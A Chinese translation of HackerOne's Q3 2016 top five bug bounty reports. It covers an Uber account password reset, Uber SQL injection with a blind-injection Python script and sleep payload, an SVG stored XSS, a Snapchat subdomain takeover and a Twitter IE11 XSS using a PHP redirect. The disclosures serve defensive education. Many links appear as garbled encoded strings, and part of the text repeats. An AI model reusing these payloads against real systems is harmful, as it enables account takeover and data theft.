-
-
[技术分享]HackerOne第三季度TOP 5 漏洞报告
-
发表于: 2016-10-31 10:31 2053
-
新闻链接:969K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0G2j5X3q4G2i4K6u0W2x3K6j5H3i4K6u0W2j5$3&6Q4x3V1k6D9k6h3q4J5L8X3W2F1k6#2)9J5c8X3c8W2N6r3q4A6L8q4)9J5c8U0x3I4y4o6N6Q4x3X3g2Z5N6r3#2D9
新闻时间:2016-10-31 10:12:47
新闻正文:
c9fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9$3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6p5@1k6r3j5K6x3h3q4V1k6U0N6U0z5e0V1$3z5e0x3%4i4K6u0W2M7r3&6Y4
翻译:sinensis
预估稿费:150RMB(不服你也来投稿啊!)
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
前言
HackerOne第三季度TOP 5 漏洞报告即将揭晓。
在这一季中,我们全力举办了Vegas比赛--Hacked the World。并在Reddit的AMA上面发起了激烈的讨论。我们的黑客在这次比赛中总共赢取了$10,000,000赏金。最重要的一点: 他们帮助了公司找到了以下重量级漏洞。
这五个漏洞不是粗略评估列出来的,而是经过认真评估,以确保内容没有重复,又不是简单的漏洞总结。详细的漏洞是最具指导性,这也是我们发布出来的原因。
漏洞详情
一、 Mongo在审查Uber的无密码注册机制的时候发现一个漏洞。然后Uber在一天之内修复好,并且在mongo确认修复之后,他得到了10,000美金。Uber对mongo表示万分感谢,我们非常高兴在HackerOne能有Mongo这样的人。
Mongo发现的漏洞如下:
通过/rt/users/passwordless-signup可以改变任何Uber用户的密码,给出任何一个受害者的手机号码(或者通过暴力列举电话号码,找出已经注册用户的手机号)。
Mongo使用了自己的手机号做了以下测试:
1
2
3
4
5
6
7
POST /rt/users/passwordless-signup HTTP/1.1
Host: cn-geo1.uber.com
User-Agent: client/iphone/2.137.1
Connection: close
Content-Type: application/json
Content-Length: 197
{"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}}
HTTP响应报文如下:
1
{"phoneNumberE164":"+xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password.","userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"}
测试步骤:
1.先注册一个乘客账号(IOS或者安卓客户端都可以)
2.对如上所示的链接发起POST请求,其中的phoneNumberE164字段就是你想修改的手机号(加上手机的区号,比如+1xxx是美国),可能需要重复两次请求,最终得到回应: "New password has been created",此时这个手机号的密码已经改变,就是POST提交时候的newPassword字段。
3.使用新的密码在c5cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4u0A6k6r3g2J5M7#2)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4c8e0N6Q4z5e0W2Q4b7V1u0Q4c8e0g2Q4b7V1c8Q4z5e0g2Q4c8e0k6Q4z5o6S2Q4z5e0k6Q4c8e0S2Q4z5o6m8Q4z5o6g2Q4c8e0g2Q4z5o6g2Q4b7U0k6Q4c8e0c8Q4b7V1u0Q4z5e0k6Q4c8e0S2Q4b7f1g2Q4b7V1g2Q4c8e0g2Q4b7e0c8Q4z5o6N6Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
二、在这博客的一系列报告中,只有orange知道让旅行的收益最大化。在中国的这个案例中,当orange取消订阅的时候,发现Uber的.cn域名存在SQL Injection漏洞,这个漏洞报告赢得了$4,000美金。
Orange发现的漏洞如下:
当orange在中国旅游使用Uber的时候,有一次他收到一份Uber的广告,并且里面有一个退订链接,但是他发现退订的连接和原来的退订链接不同,
并且这个退订连接存在SQL Injection。
Paload如下:
1
ba0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8W2P5f1Z5I4j5K6u0h3P5g2R3J5L8r3E0u0K9X3!0Y4d9h3A6g2x3@1&6f1g2h3N6k6g2K6g2C8d9f1S2z5M7#2A6i4g2Y4N6w2c8p5g2&6d9#2b7H3P5p5W2A6N6$3N6u0L8V1A6D9h3e0u0h3M7r3c8E0g2Y4W2u0K9X3!0Y4d9h3@1&6P5g2W2i4y4h3&6K9g2f1u0@1k6g2M7I4K9r3q4i4N6$3W2X3f1g2)9K6c8q4)9K6c8l9`.`.
上面这个链接让数据库sleep了12秒。p参数后面是base64,解码如下:
1
8d5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8Q4y4@1t1`."user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
然后orange写了一个盲注脚本得到数据库名字和数据库用户:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import json
import string
import requests
from urllib import quote
from base64 import b64encode
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}
for l in range(0, 30):
for i in 'i'+base:
payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
new_payload = json.dumps(payload)
new_payload = b64encode(new_payload)
r = requests.get('b7aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4U0N6s2u0S2j5$3E0Q4x3X3g2W2L8h3q4A6L8q4)9J5k6i4g2T1k6i4u0Q4x3X3g2U0L8$3#2Q4x3X3g2U0L8W2)9J5c8Y4c8J5j5h3y4C8i4K6u0r3N6h3&6K6N6h3u0K6j5%4u0A6j5X3g2Q4x3X3g2V1L8#2)9K6c8Y4m8Q4x3@1c8Q4x3U0N6Q4x3V1u0I4N6h3!0@1k6g2)9J5z5r3&6W2N6#2)9#2k6Y4m8S2P5h3I4G2j5h3c8Q4x3U0W2Q4x3U0V1`.
if len(r.content)>0:
print i,
break
最终得到mysql的用户名 sendcloud_w@10.9.79.210,数据库sedncloud。
三、Paragonie_Scott是HackerOne里面比较出众的队伍,在分析这篇奇特的.svg报告的时候,提醒我们.svg的与众不同。与其他图片格式相比,巧妙的.svg代码构造可以执行。Adbullah收到了Paragon项目有史以来最丰厚的奖励,更不用说3500次页面访问。
漏洞如下:
前提:浏览器处理SVG文件的方式非常烂,如果你要处理用户上传的SVG文件,必须确保只允许用户使用的Content-Type为text/plain。
背景:
Adbullah在ubuntu设置airship的时候碰到点问题,所以他在Paragon上面测试了下。
如果你上传任何文件(HTML,SWF等)来触发XSS,最终Content-Type的值会变成"text/palin;charset=us-ascii"。对于图片来说也一样,但是如果上传的格式是SVG,但是里面的内容是JS,最终允许上传。
这样设置Content-Type,"Content-Type: images/svg+xml; charset=us-ascii",攻击就可以成功,并且存储到用户的账户。
d28K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9H3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4W2k6h3b7%4k6o6j5%4x3K6m8X3z5e0q4S2z5o6k6T1i4K6u0W2M7r3&6Y4
四、我们经常在黑客报告中看到这样的字眼"这个漏洞好像没什么。。。",真是太谦虚了。这个控制338K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6S2M7%4c8D9P5g2)9J5k6i4y4U0i4K6u0V1j5$3c8F1i4K6u0W2L8X3g2@1i4@1f1#2i4@1q4p5i4K6V1H3i4@1f1#2i4K6W2r3i4K6W2r3i4@1f1#2i4K6V1H3i4K6S2p5i4@1f1$3i4K6S2m8i4@1p5#2i4@1f1#2i4K6V1I4i4K6S2m8i4@1f1#2i4@1t1H3i4@1t1I4i4@1f1$3i4K6V1^5i4@1q4r3i4@1f1^5i4@1u0r3i4K6V1&6i4@1f1$3i4@1p5H3i4@1t1%4i4@1f1#2i4@1u0o6i4K6R3H3i4@1f1#2i4@1p5%4i4K6S2n7i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1K6i4K6R3H3i4K6R3J5
Ebrietas从一个旧的DNS记录开始,最终获得了$3000奖金。非常感谢他的报告,避免了用户获取错误的信息。
漏洞如下:
我在一个cdn主机上面发了snapchat运行的一个测试实例,但是当这个主机取消的时候DNS记录仍然存在。所有我可以在上面重新创建一个Fastly实例来接管它。我已经通过Censys的记录确定这个snapchat所属。
最新发现这个主机仍然在被Snapchat使用。我在服务器上面发现了如下的日志:
1
2
3
4
5
6
7
8
9
10
11
12
13
root@localhost:~# cat /var/log/apache2/access.log | grep -v server-status | grep snapchat -i
23.235.39.33 - - [02/Aug/2016:18:28:25 +0000] "GET /bq/story_blob?story_id=fRaYutXlQBosonUmKavo1uA&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPad2,5; iOS 9.1; gzip)"
23.235.39.43 - - [02/Aug/2016:18:28:25 +0000] "GET /bq/story_blob?story_id=f3gHI7yhW-Q7TeACCzc2nKQ&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPad2,5; iOS 9.1; gzip)"
23.235.46.45 - - [03/Aug/2016:02:40:48 +0000] "GET /bq/story_blob?story_id=fKGG6u9zG4juOFT7-k0PNWw&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (Nexus 7; Android 5.1.1#1836172#22; gzip)"
23.235.46.23 - - [03/Aug/2016:02:40:49 +0000] "GET /bq/story_blob?story_id=fco3gXZkbBCyGc_Ym8UhK2g&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (Nexus 7; Android 5.1.1#1836172#22; gzip)"
43.249.75.20 - - [03/Aug/2016:12:39:03 +0000] "GET /discover/dsnaps?edition_id=4527366714425344&dsnap_id=5651565881327616&hash=66e61fa7787383c08a76a131e96915eec2d8b3019a3a96af66496003c9a9b1c1&publisher=Refinery29&quality=android_med9to16-android_med9to16 HTTP/1.1" 404 455 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
43.249.75.24 - - [03/Aug/2016:12:39:03 +0000] "GET /bq/story_blob?story_id=ftzqLQky4KJ_B6Jebus2Paw&t=2&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
43.249.75.22 - - [03/Aug/2016:12:39:03 +0000] "GET /bq/story_blob?story_id=fEXbJ2SDn3Os8m4aeXs-7Cg&t=2&mt=0 HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (GT-I9300; Android 4.3#I9300XWUGML4#18; gzip)"
23.235.46.21 - - [03/Aug/2016:14:46:18 +0000] "GET /bq/story_blob?story_id=fu8jKJ_5yF71_WEDi8eiMuQ&t=1&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone5,2; iOS 9.2; gzip)"
23.235.46.28 - - [03/Aug/2016:14:46:19 +0000] "GET /bq/story_blob?story_id=flWVBXvBXToy-vhsBdze11g&t=1&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone5,2; iOS 9.2; gzip)"
23.235.44.35 - - [04/Aug/2016:05:57:37 +0000] "GET /bq/story_blob?story_id=fuZO-2ouGdvbCSggKAWGTaw&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (SAMSUNG-SGH-I537; Android 5.0.1#I537UCUCOC7#21; gzip)"
23.235.44.46 - - [04/Aug/2016:05:57:37 +0000] "GET /bq/story_blob?story_id=fa3DTt_mL0MhekUS9ZXg49A&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.0 (SAMSUNG-SGH-I537; Android 5.0.1#I537UCUCOC7#21; gzip)"
185.31.18.21 - - [04/Aug/2016:19:50:01 +0000] "GET /bq/story_blob?story_id=fDL270uTcFhyzlRENPVPXnQ&t=0&mt=1&encoding=compressed HTTP/1.1" 404 453 "-" "Snapchat/9.21.1.1 (iPhone7,1; iOS 9.3.2; gzip)"
这样看起来我可以添加任何内容,不管是哪个app在使用。
五、埃及的secgeek向twitter反馈了这个漏洞:sms-be-vip.twitter.com上存在HTML注入并且可能有XSS漏洞。这个漏洞影响到了最新版的IE浏览器(IE 11),它会导致html标签注入和JavaScript执行。在HackerOne,我们尤其欣赏专业和求同存异,最终这个漏洞获得了$420奖金。
漏洞如下:
在sms-be-vip.twitter.cm的404页面好像存在XSS和HTML注入,因为他并没有对HTML标签进行编码,比如629K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6L8i4y4Q4x3X3c8T1k6g2)9J5k6s2k6A6M7q4)9J5k6i4c8%4K9i4c8@1k6i4u0Q4x3X3g2U0L8$3#2Q4x3V1k6Q4x3U0k6D9N6q4)9K6b7X3R3I4i4K6t1$3k6%4c8Q4x3@1u0f1c8g2y4f1i4K6t1$3L8s2c8Q4x3@1u0Q4x3V1k6Z5x3g2)9J5y4X3N6@1i4K6y4n7i4@1f1K6i4K6R3H3i4K6R3J5
要触发这个漏洞,必须要确定URL不会编码之后发送,但是一般浏览器都会对URL进行编码。然而在最新的IE11或者更低版本的IE浏览器里面,这是可以做到的。
如何在使IE11在发送的时候不对URL进行编码处理呢?
在302跳转的时候IE不会对URL进行编码,所以我们可以写一个中转脚本:
1
2
3
4
<?php
$url = $_GET['x'];
header("Location: $url");
?>
然后使用如上的脚本对存在XSS的地方发起请求。
1
56fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3N6W2k6h3E0Q4x3X3g2F1k6i4c8Q4x3V1k6b7e0@1y4Q4x3V1k6J5k6h3c8A6M7W2)9J5k6i4m8Z5M7q4)9K6c8Y4S2Q4x3@1c8Z5N6s2c8H3M7#2)9K6b7g2)9J5c8W2)9J5c8Y4y4E0M7#2)9J5k6r3u0W2i4K6u0V1N6X3W2H3i4K6u0W2N6s2N6A6N6s2c8W2M7W2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4X3I4@1i4K6y4n7K9o6q4Q4x3U0k6Y4N6q4)9K6b7W2c8q4f1#2c8Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3R3I4i4K6t1$3k6%4c8Q4x3@1t1`.
现在你就会在IE浏览器里面看到HTTP的错误信息,而不是在错误页面看到<h1>TEST</h1>
微软的HTTP错误信息会在满足下面两个条件的时候出现:
1. HTTP的状态必须是[400, 403, 404, 405, 406, 408, 409, 410, 500, 501, 505]
2. HTTP的应答长度小于预定值,对于404来说这个数值是512字节。
所以我在后面添加更多的数据来避免上面的问题:
1
3b6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2j5$3N6W2k6h3E0Q4x3X3g2F1k6i4c8Q4x3V1k6b7e0@1y4Q4x3V1k6J5k6h3c8A6M7W2)9J5k6i4m8Z5M7q4)9K6c8Y4S2Q4x3@1c8Z5N6s2c8H3M7#2)9K6b7g2)9J5c8W2)9J5c8Y4y4E0M7#2)9J5k6r3u0W2N6X3W2H3i4K6u0W2N6s2N6A6N6s2c8W2M7W2)9J5k6h3y4G2L8g2)9J5c8W2)9J5y4X3I4@1i4K6y4n7K9o6q4Q4x3U0k6Y4N6q4)9K6b7W2c8q4f1#2c8Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3R3I4i4K6t1$3k6%4c8Q4x3@1u0Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3g2Q4x3X3f1`.
这个漏洞允许恶意攻击者插入HTML标签,执行JS,最终可能导致用户session泄露,发起CSRF攻击或者引入一个钓鱼网站。
如果你觉得某个漏洞具有引导性或者非常棒,可以在Hacktivity页面点赞 。
这个漏洞允许恶意攻击者插入HTML标签,执行JS,最终可能导致用户session泄露,发起CSRF攻击或者引入一个钓鱼网站。
后记
想在下一季中出现么?上传你的漏洞报告或邀请你的黑客团队,就像上面这些公司一样。就像我曾经读过的博客,每个团队都需要一个赏金项目。
Rejesh F. Krishnan
769K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9@1i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4U0k6o6k6S2x3U0p5#2j5h3c8X3z5o6g2X3j5e0b7#2i4K6u0W2K9Y4m8Y4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9H3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6q4V1x3h3k6U0z5e0j5^5x3h3b7#2x3U0l9$3y4K6M7#2i4K6u0W2K9Y4m8Y4
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:c86K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Z5j5h3y4C8k6i4u0G2L8X3g2Q4x3X3g2U0L8$3#2Q4x3V1k6T1L8r3!0Y4i4K6u0r3N6r3!0H3i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1P5g2)9J5k6s2u0W2M7r3!0J5N6s2y4Q4x3X3c8G2k6W2)9J5k6o6y4c8i4K6u0V1x3U0l9I4y4R3`.`.
新闻时间:2016-10-31 10:12:47
新闻正文:
c9fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4l9$3i4K6u0W2M7h3S2A6L8h3N6Q4x3X3g2U0L8$3#2Q4x3V1k6@1x3o6p5@1k6r3j5K6x3h3q4V1k6U0N6U0z5e0V1$3z5e0x3%4i4K6u0W2M7r3&6Y4
翻译:sinensis
预估稿费:150RMB(不服你也来投稿啊!)
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
前言
HackerOne第三季度TOP 5 漏洞报告即将揭晓。
在这一季中,我们全力举办了Vegas比赛--Hacked the World。并在Reddit的AMA上面发起了激烈的讨论。我们的黑客在这次比赛中总共赢取了$10,000,000赏金。最重要的一点: 他们帮助了公司找到了以下重量级漏洞。
这五个漏洞不是粗略评估列出来的,而是经过认真评估,以确保内容没有重复,又不是简单的漏洞总结。详细的漏洞是最具指导性,这也是我们发布出来的原因。
漏洞详情
一、 Mongo在审查Uber的无密码注册机制的时候发现一个漏洞。然后Uber在一天之内修复好,并且在mongo确认修复之后,他得到了10,000美金。Uber对mongo表示万分感谢,我们非常高兴在HackerOne能有Mongo这样的人。
Mongo发现的漏洞如下:
通过/rt/users/passwordless-signup可以改变任何Uber用户的密码,给出任何一个受害者的手机号码(或者通过暴力列举电话号码,找出已经注册用户的手机号)。
Mongo使用了自己的手机号做了以下测试:
1
2
3
4
5
6
7
POST /rt/users/passwordless-signup HTTP/1.1
Host: cn-geo1.uber.com
User-Agent: client/iphone/2.137.1
Connection: close
Content-Type: application/json
Content-Length: 197
{"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}}
HTTP响应报文如下:
1
{"phoneNumberE164":"+xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password.","userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"}
测试步骤:
1.先注册一个乘客账号(IOS或者安卓客户端都可以)
2.对如上所示的链接发起POST请求,其中的phoneNumberE164字段就是你想修改的手机号(加上手机的区号,比如+1xxx是美国),可能需要重复两次请求,最终得到回应: "New password has been created",此时这个手机号的密码已经改变,就是POST提交时候的newPassword字段。
